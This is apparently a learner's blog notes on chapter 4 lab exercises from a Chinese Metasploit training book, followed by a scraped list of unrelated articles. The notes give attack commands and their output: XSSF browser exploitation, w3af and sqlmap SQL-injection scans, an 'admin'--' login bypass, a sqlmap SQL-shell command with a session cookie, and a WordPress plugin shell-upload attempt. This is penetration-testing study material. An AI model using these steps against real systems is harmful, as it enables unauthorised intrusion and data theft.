《Metasploit魔鬼训练营》第四章(下)

p163 XSSF

默认kali 2.0中没有xssf,先下载:https://code.google.com/archive/p/xssf/downloads

将下载下来的zip文件解压,将其中的data, plugins, lab等文件夹合并到/usr/share/metasploit-framework/中的相应文件夹,然后即可在msfconsole中load xssf。

按照书上的做,但是最后的攻击并没有成功!

msf auxiliary(browser_autopwn) > xssf_exploit 8 15
[*] Searching Metasploit launched module with JobID = ‘15‘...
[+] A running exploit exists: ‘Exploit: windows/browser/ie_createobject‘
[*] Exploit execution started, press [CTRL + C] to stop it !

[+] Remaining victims to attack: [[1] (1)]  (停在这里一直不动)

^C[-] Exploit interrupted by the console user

p180 实践作业

1、探测www.testfire.net中存在的sql注入漏洞:

[email protected]:~# w3af_console
w3af>>> plugins
w3af/plugins>>> audit sqli
w3af/plugins>>> crawl web_spider
w3af/plugins>>> back
w3af>>> target
w3af/config:target>>> set target http://www.testfire.net/bank/login.aspx
w3af/config:target>>> back
The configuration has been saved.
w3af>>> plugins
w3af/plugins>>> output html_file
w3af/plugins>>> output config html_file
w3af/plugins/output/config:html_file>>> set verbose True
w3af/plugins/output/config:html_file>>> back
The configuration has been saved.
w3af/plugins>>> back
w3af>>> start

成功扫出 8 URLs and 10 different injections points.

用sqlmap去扫

sqlmap -u "http://www.testfire.net/bank/login.aspx" --data "uid=Admin&passw=a&btnSubmit=Login"

检测出后台数据库的一些信息

在http://www.testfire.net/bank/login.aspx中通过构造   admin‘--   的输入,轻松登入。

但是要怎么进一步的获得数据库中的信息呢?我还没搞定。

2、照书本p163做即可

3、wXf下载地址:  https://github.com/forced-request/wXf

下载后解压,切换至解压目录下,运行./console,提示

/usr/lib/ruby/2.2.0/rubygems/core_ext/kernel_require.rb:54:in `require‘: cannot load such file -- iconv (LoadError)

由于对ruby不太熟悉,网上的方法也看不太懂,暂且跳过。

4、我选择这个漏洞进行测试     https://www.exploit-db.com/exploits/37182/

然而得到的测试结果为:

[CRITICAL] all tested parameters appear to be not injectable. 

不知道是不是后台服务器软件的版本问题。

5、不知道怎么弄。。先跳过

6、通过如下命令成功植入sql shell!

sqlmap -u ‘http://www.dvssc.com/dvwa/vulnerabilities/sqli/?id=aa&Submit=Submit#‘  --cookie=‘security=low; PHPSESSID=7918oeoatnur63rq8bokn88sd2‘ --sql-shell

7、p177

按照提示一步一步来,但是没有成功:

[*] Started reverse TCP handler on 10.10.10.128:4444
[*] Successfully uploaded shell.
[*] Trying to access shell at <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>413 Request Entity Too Large</title>
</head><body>
<h1>Request Entity Too Large</h1>
The requested resource<br />/wordpress//wp-content/plugins/1-flash-gallery/upload.php<br />
does not allow request data with POST requests, or the amount of data provided in
the request exceeds the capacity limit.
</body></html>
...
[*] Exploit completed, but no session was created.
时间: 2024-10-14 00:07:33

《Metasploit魔鬼训练营》第四章(下)的相关文章

《Metasploit魔鬼训练营》第一章习题

书本p391.The time line is as follows: * May 7, 2007: Initial defect disclosure to the [email protected] email alias. * May 7, 2007: Initial developer response by Samba developer Gerald Carter. * May 9, 2007: Patch released by Samba developer Jeremy All

C和指针 (pointers on C)——第四章:语句(下)习题解答

题目请见 http://download.csdn.net/download/wangpegasus/5701765 第四章以下通过VS2012 1. #include "stdafx.h" double sqrt(double temp) { double before, after; before = 1.0; after = 1.0; do { before = after; after = (before + temp/before)/2; } while (before !=

Android艺术开发探索第四章——View的工作原理(下)

Android艺术开发探索第四章--View的工作原理(下) 我们上篇BB了这么多,这篇就多多少少要来点实战了,上篇主席叫我多点自己的理解,那我就多点真诚,少点套路了,老司机,开车吧! 我们这一篇就扯一个内容,那就是自定义View 自定义View 自定义View的分类 自定义View的须知 自定义View的实例 自定义View的思想 一.自定义View的分类 自定义View百花齐放,没有什么具体的分类,不过可以从特性大致的分为4类,其实在我看来,就三类,继承原生View,继承View和继承Vie

第四章

第四章 源代码的下载和编译 1.下载.编译和测试Android源代码 配置Android源代码的下载环境 ①创建一个存放下载脚本文件(repo)的目录 # mkdir  ~/bin # PATH=~/bin:$PATH ②下载repo脚本文件 # curi http://dl-ssl.google.com/dl/googlesource/git-repo/repo > -/bin/repo # chmod a+x ~/bin/repo ③创建存放Android源代码的目录 # mkdir and

《UML精粹》 第四章 时序图

第四章 时序图 一般来说,我们会在一张时序图中画出某个情节的相关行为,图种会秀出这个使用案例(use case)里面可能出现的一些对象,以及在对象间传送的信息. 本章将通过一个简单情节,做时序图各方面的相关讨论.假设我们现在有一份订单,并且准备调用它的一个命令,算出这份订单的价格.为了达到这个目的,订单需要产看它里面所拥有的一些订单明细.决定它们的价格,价格决定方式是以订单明细中所包含产品之定价规则为基础决定的.对所有订单明细做完上述动作之后,接下来订单要算出整个折扣,这时候它是以跟客户绑在一起

构建之法学习(第四章 两人合作)

第四章 两人合作 1.代码规范  1)代码风格规范.主要是文字上的规定,看似表面文章,实际上非常重要. *原则:简明,易读,无二义性 *缩进:4个空格 *行宽:行宽必须限制,可以限定为100字符 *括号:在复杂的条件表达式中,用括号清除地表示逻辑优先级 *断行与空白的{}行:推荐格式如下 if ( condition ) {        DoSomething(); } else {       DoSomethingElse(); } *分行:不要把多条语句放在一行上.并且,不要把多个变量定

第四章—变量,作用域和内存问题(二)

第四章-变量,作用域和内存问题(二) JS没有块级作用域 js没有块级作用域,这个概念容易导致误解,这里就区分下几个情况,大家好好参考下: 我们知道,在其他类C的语言中,由花挂号封闭的代码块都有自己的作用域.但是在JS中,却没有块级作用域: 这里if(true){}代表条件永真,永远执行这条.if(false){}的话就是永远不执行这条. 这个代码执行之后,在if语句定义的变量,在if语句外可以访问的到.在if语句中的变量声明会将变量添加到当前的执行环境中(这里是全局环境). 还有如下的两个例子

Shell脚本学习指南 [ 第三、四章 ] 查找与替换、文本处理工具

摘要:第三章讨论的是编写Shell脚本时经常用到的两个基本操作.第四章总共介绍了约30种处理文本文件的好用工具. 第三章 查找与替换 概括:本章讨论的是编写Shell脚本时经常用到的两个基本操作:文本查找.文本替换. 3.1  查找文本 如需从输入的数据文件中取出特定的文本行,主要的工具为grep程序.POSIX采用三种不同grep变体:grep.egrep.fgrep整合为单个版本,通过不同的选项,分别提供这三种行为模式.who | grep -F root上面使用-F选项,以查找固定字符串r

20145320《Java程序设计》第3周学习总结(第四章)

20145320<Java程序设计>第3周学习总结(第四章) 教材学习内容总结 对象(Object):存在的具体实体,具有明确的状态和行为 类(Class):具有相同属性和行为的一组对象的集合,用于组合各个对象所共有操作和属性的一种机制 从类看对象:类定义可以视为一个具有类似特性与共同行为的对象的模板,可用来产生对象 从对象看类:类的产生,是从少数实例,推广到大量相似实例的抽象化过程(abstraction) 类是对象的设计图,对象是类的实例,生成对象要先定义类 4.1 类与对象 定义类使用c

掌握需求分析第四章读后感

第四章的标题是,事件驱动的用况,首先我们先来理解一下什么是用况,那么什么是用况,通读本章给出的解释是:由产品完成的那一部分工作称为用况,因为是分析业务事件的响应来得到用况的,因此有事件驱动的用况这个术语. 在项目启动阶段我们需要将系统分解成为一些小块,并找出符合以下条件的部分:“自然的”部分即工作明显的的部分,与工作的其他部分连接数目最少,有一些规则来定义他们的范围,有可以描述和量化的边界,可以使用业务专家熟悉的名称来命名,业务专家指客户,顾客和用户,他们的存在可以很容易地确定:用户知道:我们可